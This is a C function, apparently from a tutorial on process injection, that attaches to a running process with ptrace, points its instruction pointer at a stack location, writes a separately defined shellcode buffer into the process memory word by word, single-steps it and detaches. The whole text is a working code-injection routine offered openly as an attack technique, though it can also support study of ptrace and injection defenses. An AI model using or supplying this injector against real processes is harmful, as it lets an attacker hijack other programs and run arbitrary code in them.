int Tracer(pid_t pid)
{
	int 	error, ptr, begin, i = 0;
	struct 	user_regs_struct data;   /* Structure to store the Registers */

	if ((error = ptrace(PTRACE_ATTACH, pid, NULL, NULL))){
		perror("Attach");
		exit(1);
	}
	waitpid(pid, NULL, 0); 		     /* Wait for the process to stop */

	if ((error = ptrace(PTRACE_GETREGS, pid, NULL, &data)))
		perror("Getregs");
	printf("%%eip : 0x%.8lx\n", data.ip);         /* Print the contents */
	printf("%%esp : 0x%.8lx\n", data.sp);         /* of registers       */

	ptr = begin = data.sp - 512 ;		  /* Get the location to which 
						         we    have to write */
	printf("Inserting shellcode into %.8lx\n", (long)begin);
	data.ip = (long) begin;		       /* Change the Pointer */

	ptrace(PTRACE_SETREGS, pid, NULL, &data);       /* Set the Registers */	

	while (i < strlen(shellcode)) {			/* Insert the code   */	
		ptrace(PTRACE_POKETEXT, pid, ptr,	/* to the process    */	
		       (int) *(int *) (shellcode + i));	/* image	     */
		i += 4;
		ptr += 4;
	}
	puts("Now we set now code");
	ptrace(PTRACE_SINGLESTEP, pid, 0,0); 
	int status;
	wait(&status);
	if(status != (1407) ){
		puts("Some error");
		exit(1);
	}
	ptrace(PTRACE_DETACH, pid, NULL, NULL);		/* Detach the Process*/ 
							/* Don't Forget	     */
	return 0;
}


